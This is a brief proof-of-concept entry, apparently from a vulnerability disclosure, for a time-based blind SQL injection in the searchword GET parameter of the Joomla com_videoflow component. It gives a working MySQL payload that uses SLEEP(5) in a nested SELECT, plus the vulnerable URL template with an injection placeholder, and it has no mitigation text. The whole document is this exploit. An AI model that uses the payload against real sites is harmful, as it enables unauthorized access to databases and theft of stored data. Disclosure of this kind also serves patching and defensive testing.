- POC :
- SQL Injection :
Parameter: searchword (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: option=com_videoflow&task=search&vs=1&searchword=Tutorialaa') AND (SELECT * FROM (SELECT(SLEEP(5)))DBYE) AND ('bEOv'='bEOv&layout=listview&Itemid=2
http://server/index.php?option=com_videoflow&task=search&vs=1&searchword=[SQL]&layout=listview&Itemid=2
